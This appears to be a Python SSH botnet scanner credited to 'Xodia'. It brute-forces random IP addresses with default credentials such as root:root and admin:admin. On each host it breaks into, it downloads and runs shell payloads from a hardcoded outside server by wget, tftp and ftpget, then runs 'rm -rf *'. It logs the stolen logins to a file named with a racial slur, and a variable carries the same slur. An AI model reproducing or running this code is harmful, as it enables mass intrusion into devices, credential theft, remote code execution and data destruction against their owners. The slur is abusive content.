heh.py.py

1. #!/usr/bin/env python
2. # https://www.youtube.com/watch?v=WIKLu32cZbA
3. import threading, paramiko, random, socket, time, sys
4.  
5. paramiko.util.log_to_file("/dev/null")
6.  
7. blacklist = [
8. '127'
9. ]
10.  
11. passwords = [
12. "admin:admin"
13. ]
14.  
15. if sys.argv[4] == '1':
16. passwords = ["root:root"]
17. if sys.argv[4] == '2':
18. passwords = ["guest:guest"]
19. if sys.argv[4] == '3':
20. passwords = ["admin:1234"]
21. if sys.argv[4] == '4':
22. passwords = ["telnet:telnet","admin:123456","1234:1234","admin:admin","admin:admin123","admin:password","admin:root","camera:camera","D-Link:D-Link","default:default","dvr:dvr","root:1234","ubnt:ubnt","user:user"]
23.  
24. print "\x1b[0;31m*************************\x1b[0m"
25. print "\x1b[0;31m* Welcome To xodia *\x1b[0m"
26. print "\x1b[0;31m* Scanner on!! *\x1b[0m"
27. print "\x1b[0;31m*************************\x1b[0m"
28. print "\x1b[0;36mMade By Xodia\x1b[0m"
29.  
30. ipclassinfo = sys.argv[2]
31. if ipclassinfo == "A":
32. ip1 = sys.argv[3]
33. elif ipclassinfo == "B":
34. ip1 = sys.argv[3].split(".")[0]
35. ip2 = sys.argv[3].split(".")[1]
36. elif ipclassinfo == "C":
37. ips = sys.argv[3].split(".")
38. num=0
39. for ip in ips:
40. num=num+1
41. if num == 1:
42. ip1 = ip
43. elif num == 2:
44. ip2 = ip
45. elif num == 3:
46. ip3 = ip
47. class sshscanner(threading.Thread):
48. global passwords
49. global ipclassinfo
50. if ipclassinfo == "A":
51. global ip1
52. elif ipclassinfo == "B":
53. global ip1
54. global ip2
55. elif ipclassinfo == "C":
56. global ip1
57. global ip2
58. global ip3
59. def run(self):
60. while 1:
61. try:
62. while 1:
63. thisipisbad='no'
64. if ipclassinfo == "A":
65. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
66. elif ipclassinfo == "B":
67. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
68. elif ipclassinfo == "C":
69. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
70. elif ipclassinfo == "BRAZIL":
71. br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
72. self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
73. elif ipclassinfo == "ER":
74. yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
75. self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
76. elif ipclassinfo == "LUCKY":
77. lucky = ["125.27","101.109","113.53","118.173","122.170","122.180"]
78. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
79. elif ipclassinfo == "LUCKY2":
80. lucky2 = [ "122.3","122.52","122.54","119.93" ]
81. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
82. elif ipclassinfo == "LUCKY3":
83. lucky2 = [ "103.20","103.30","103.47","103.57" ]
84. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
85. elif ipclassinfo == "RAND":
86. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
87. elif ipclassinfo == "INTERNET":
88. lol = ["1"]
89. self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
90. else:
91. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
92. for badip in blacklist:
93. if badip in self.host:
94. thisipisbad='yes'
95. if thisipisbad=='no':
96. break
97. username='root'
98. password=""
99. port = 22
100. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
101. s.settimeout(3)
102. s.connect((self.host, port))
103. s.close()
104. ssh = paramiko.SSHClient()
105. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
106. dobreak=False
107. for passwd in passwords:
108. if ":n/a" in passwd:
109. password=""
110. else:
111. password=passwd.split(":")[1]
112. if "n/a:" in passwd:
113. username=""
114. else:
115. username=passwd.split(":")[0]
116. try:
117. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
118. dobreak=True
119. break
120. except:
121. pass
122. if True == dobreak:
123. break
124. badserver=True
125. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
126. output = stdout.read()
127. if "inet addr" in output:
128. badserver=False
129. if badserver == False:
130. print '\x1b[0;31mPOISONING \x1b[0;37m'+self.host+' \x1b[0;36m'+username+' \x1b[0;31m'+password+' \x1b[0;37m'+str(port)
131. ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://145.239.38.5/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 145.239.38.5 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 145.239.38.5; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 145.239.38.5 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
132. nigger = open("niggers.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
133. time.sleep(15)
134. ssh.close()
135. except:
136. pass
137.  
138. for x in range(0,1500):
139. try:
140. t = sshscanner()
141. t.start()
142. except:
143. pass